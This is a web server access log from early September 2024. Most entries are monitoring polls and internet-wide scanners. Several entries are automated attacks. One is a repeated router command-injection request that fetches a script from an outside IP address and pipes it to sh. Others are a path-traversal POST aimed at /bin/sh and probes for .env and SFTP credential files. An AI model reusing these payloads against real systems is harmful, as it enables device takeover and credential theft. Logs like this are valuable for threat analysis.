212.91.246.72 - - [01/Sep/2024:22:56:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:57:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:58:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:59:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.46 - - [01/Sep/2024:22:59:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.46 - - [01/Sep/2024:22:59:44 +0200] "GET /login HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
178.211.139.188 - - [01/Sep/2024:23:00:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:23:00:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:01:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:02:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:23:02:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:03:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:23:03:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:04:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:23:04:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:23:05:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:05:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.34.253.149 - - [01/Sep/2024:23:06:10 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "-"
149.34.253.149 - - [01/Sep/2024:23:06:10 +0200] "GET /sftp-config.json HTTP/1.1" 404 321 "-" "-"
149.34.253.149 - - [01/Sep/2024:23:06:10 +0200] "GET /sftp.json HTTP/1.1" 404 314 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:06:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.132.195 - - [01/Sep/2024:23:06:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.195 - - [01/Sep/2024:23:06:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:07:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.172 - - [01/Sep/2024:23:07:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.84 - - [01/Sep/2024:23:07:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:23:08:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:23:08:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:09:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:09:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:23:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:23:10:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [01/Sep/2024:23:11:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:23:11:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:23:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:12:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:23:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.227.147.215 - - [01/Sep/2024:23:14:42 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.227.147.215 - - [01/Sep/2024:23:14:45 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.227.147.215 - - [01/Sep/2024:23:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Sep/2024:23:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:17:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:23:17:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:23:18:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:18:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
205.210.31.106 - - [01/Sep/2024:23:18:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Sep/2024:23:19:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Sep/2024:23:20:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:23:20:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Sep/2024:23:20:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.84 - - [01/Sep/2024:23:20:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:23:21:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:22:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:23:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:23:24:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:23:24:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Sep/2024:23:24:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:23:25:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:26:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:23:26:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:27:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:28:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:29:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:30:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:23:30:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:31:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.32.219.124 - - [01/Sep/2024:23:32:18 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.246.72 - - [01/Sep/2024:23:32:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:23:33:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:33:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:34:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:23:35:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:35:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:36:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:23:36:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Sep/2024:23:37:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
80.82.77.202 - - [01/Sep/2024:23:37:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
185.224.128.84 - - [01/Sep/2024:23:37:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:23:37:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Sep/2024:23:37:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
212.91.246.72 - - [01/Sep/2024:23:38:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:23:38:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:39:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:40:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:41:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:23:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:42:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:43:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:44:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:45:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:23:46:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:46:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:23:46:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:47:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:47:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:23:48:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:49:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:50:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [01/Sep/2024:23:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:23:50:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.132.162 - - [01/Sep/2024:23:50:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Sep/2024:23:51:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:52:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:53:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.177 - - [01/Sep/2024:23:53:54 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2"
78.153.140.177 - - [01/Sep/2024:23:53:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [01/Sep/2024:23:53:54 +0200] "GET /.env_old HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36"
212.91.246.72 - - [01/Sep/2024:23:54:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:23:54:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.216.20.249 - - [01/Sep/2024:23:55:16 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.249 - - [01/Sep/2024:23:55:17 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Sep/2024:23:55:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:56:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.60.26 - - [01/Sep/2024:23:56:39 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.22.60.26 - - [01/Sep/2024:23:56:41 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.22.60.26 - - [01/Sep/2024:23:56:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Sep/2024:23:57:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:23:58:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:23:59:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:23:59:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:00:00:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:00:01:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:00:01:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:00:02:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
76.140.60.28 - - [02/Sep/2024:00:02:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:00:03:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:00:04:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:00:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:00:06:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:00:07:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.190.119.189 - - [02/Sep/2024:00:07:54 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
146.190.119.189 - - [02/Sep/2024:00:07:59 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
146.190.119.189 - - [02/Sep/2024:00:08:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Sep/2024:00:08:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:00:09:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:00:10:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:00:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:00:15:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
47.251.13.59 - - [02/Sep/2024:00:16:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [02/Sep/2024:00:16:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:00:19:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:00:20:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.68.104 - - [02/Sep/2024:00:25:29 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; moto g(6) plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
94.156.68.104 - - [02/Sep/2024:00:25:45 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; alexa site audit/1.0; +http://www.alexa.com/help/webmasters; )"
94.156.68.104 - - [02/Sep/2024:00:26:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1"
198.235.24.216 - - [02/Sep/2024:00:26:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.216 - - [02/Sep/2024:00:26:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.156.68.104 - - [02/Sep/2024:00:26:21 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
94.156.68.104 - - [02/Sep/2024:00:26:24 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
94.156.68.104 - - [02/Sep/2024:00:26:31 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 4.4.2; GT-N8000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36"
94.156.68.104 - - [02/Sep/2024:00:26:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1"
94.156.68.104 - - [02/Sep/2024:00:26:38 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5"
94.156.68.104 - - [02/Sep/2024:00:26:45 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0"
94.156.68.104 - - [02/Sep/2024:00:26:45 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
47.251.13.59 - - [02/Sep/2024:00:26:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
89.190.156.137 - - [02/Sep/2024:00:28:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
